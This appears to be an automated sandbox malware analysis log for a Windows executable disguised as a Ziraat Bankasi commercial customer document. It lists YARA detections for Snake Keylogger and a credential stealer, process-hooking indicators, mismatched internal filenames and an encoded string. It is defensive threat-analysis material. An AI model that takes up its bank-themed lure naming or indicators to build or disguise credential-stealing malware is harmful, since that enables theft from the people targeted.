Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.38f4608.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.38f4608.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.38d43e8.4.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.38d43e8.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.38d43e8.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000003.00000002.4152159317.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000003.00000002.4152159317.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000000.00000002.1741437321.0000000003869000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.1741437321.0000000003869000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: Process Memory Space: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe PID: 6640, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe PID: 6640, type: MEMORYSTR Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: Process Memory Space: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe PID: 7124, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe PID: 7124, type: MEMORYSTR Matched rule: Detects Snake Keylogger Author: ditekSHen
Abnormal high CPU Usage
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Process Stats: CPU usage > 49%
Detected potential crypto function
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Code function: 0_2_00FCDE4C 0_2_00FCDE4C
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Code function: 3_2_0191C190 3_2_0191C190
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Code function: 3_2_01916108 3_2_01916108
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Code function: 3_2_01919540 3_2_01919540
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Code function: 3_2_0191B4A0 3_2_0191B4A0
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Code function: 3_2_0191C470 3_2_0191C470
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Code function: 3_2_01916730 3_2_01916730
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Code function: 3_2_0191C753 3_2_0191C753
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Code function: 3_2_0191BBD3 3_2_0191BBD3
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Code function: 3_2_01914AD9 3_2_01914AD9
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Code function: 3_2_0191CA33 3_2_0191CA33
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Code function: 3_2_0191BEB0 3_2_0191BEB0
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Code function: 3_2_01913573 3_2_01913573
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Code function: 3_2_0191B4F3 3_2_0191B4F3
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Code function: 3_2_06F35488 3_2_06F35488
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Code function: 3_2_06F30B30 3_2_06F30B30
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Code function: 3_2_06F3A0D0 3_2_06F3A0D0
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Code function: 3_2_06F31848 3_2_06F31848
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Code function: 3_2_06F329C8 3_2_06F329C8
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Code function: 3_2_06F399A8 3_2_06F399A8
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Code function: 3_2_06F3E6B6 3_2_06F3E6B6
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Code function: 3_2_06F3E6B8 3_2_06F3E6B8
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Code function: 3_2_06F3DE08 3_2_06F3DE08
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Code function: 3_2_06F38FF0 3_2_06F38FF0
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Code function: 3_2_06F39788 3_2_06F39788
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Code function: 3_2_06F3EF68 3_2_06F3EF68
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Code function: 3_2_06F3EF58 3_2_06F3EF58
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Code function: 3_2_06F31CA8 3_2_06F31CA8
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Code function: 3_2_06F31C99 3_2_06F31C99
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Code function: 3_2_06F35478 3_2_06F35478
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Code function: 3_2_06F3DDF9 3_2_06F3DDF9
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Code function: 3_2_06F32568 3_2_06F32568
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Code function: 3_2_06F3D558 3_2_06F3D558
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Code function: 3_2_06F32558 3_2_06F32558
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Code function: 3_2_06F3D548 3_2_06F3D548
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Code function: 3_2_06F3E260 3_2_06F3E260
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Code function: 3_2_06F3E250 3_2_06F3E250
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Code function: 3_2_06F3F3C0 3_2_06F3F3C0
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Code function: 3_2_06F3F3B1 3_2_06F3F3B1
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Code function: 3_2_06F3EB10 3_2_06F3EB10
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Code function: 3_2_06F30B1F 3_2_06F30B1F
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Code function: 3_2_06F3EB01 3_2_06F3EB01
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Code function: 3_2_06F320F9 3_2_06F320F9
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Code function: 3_2_06F3D0EF 3_2_06F3D0EF
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Code function: 3_2_06F3A068 3_2_06F3A068
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Code function: 3_2_06F30040 3_2_06F30040
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Code function: 3_2_06F31838 3_2_06F31838
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Code function: 3_2_06F3F818 3_2_06F3F818
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Code function: 3_2_06F39000 3_2_06F39000
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Code function: 3_2_06F30006 3_2_06F30006
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Code function: 3_2_06F3F809 3_2_06F3F809
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Code function: 3_2_06F3D9B0 3_2_06F3D9B0
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Code function: 3_2_06F329B8 3_2_06F329B8
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Code function: 3_2_06F3D9A1 3_2_06F3D9A1
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Code function: 3_2_06F3D100 3_2_06F3D100
Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Code function: 3_2_06F32108 3_2_06F32108
Sample file is different than original file name gathered from version info
Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000000.00000002.1741437321.0000000003A63000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTyrone.dll8 vs ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000000.00000002.1741437321.0000000003869000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000000.00000002.1739949343.00000000009DE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000000.00000000.1694179501.00000000004E4000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameRRye.exeD vs ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000000.00000002.1748781541.0000000007220000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameTyrone.dll8 vs ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000000.00000002.1741070002.0000000002861000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4152159317.0000000000422000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4152340010.0000000001337000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: OriginalFilenameUNKNOWN_FILET vs ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Binary or memory string: OriginalFilenameRRye.exeD vs ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
Uses 32bit PE files
Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Yara signature match
Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.38d43e8.4.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.38d43e8.4.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.38d43e8.4.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.38d43e8.4.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 3.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 3.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 3.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 3.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.38f4608.3.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.38f4608.3.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.38f4608.3.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.38f4608.3.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.38f4608.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.38f4608.3.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.38f4608.3.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.38d43e8.4.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.38d43e8.4.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.38d43e8.4.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000003.00000002.4152159317.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000003.00000002.4152159317.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000000.00000002.1741437321.0000000003869000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.1741437321.0000000003869000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: Process Memory Space: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe PID: 6640, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe PID: 6640, type: MEMORYSTR Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: Process Memory Space: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe PID: 7124, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe PID: 7124, type: MEMORYSTR Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.38d43e8.4.raw.unpack, Z.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.38d43e8.4.raw.unpack, Z.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.38d43e8.4.raw.unpack, -.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.38d43e8.4.raw.unpack, -.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.38f4608.3.raw.unpack, Z.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.38f4608.3.raw.unpack, Z.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.38f4608.3.raw.unpack, -.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.38f4608.3.raw.unpack, -.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.38d43e8.4.raw.unpack, -.cs Base64 encoded string: 'G4pV1kZlzrWG3ii/qsKXSnYs+5NUWVZZLTztKeesew9//zKKMVqxJyBhDWLI4hit'
Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.38f4608.3.raw.unpack, -.cs Base64 encoded string: 'G4pV1kZlzrWG3ii/qsKXSnYs+5NUWVZZLTztKeesew9//zKKMVqxJyBhDWLI4hit'
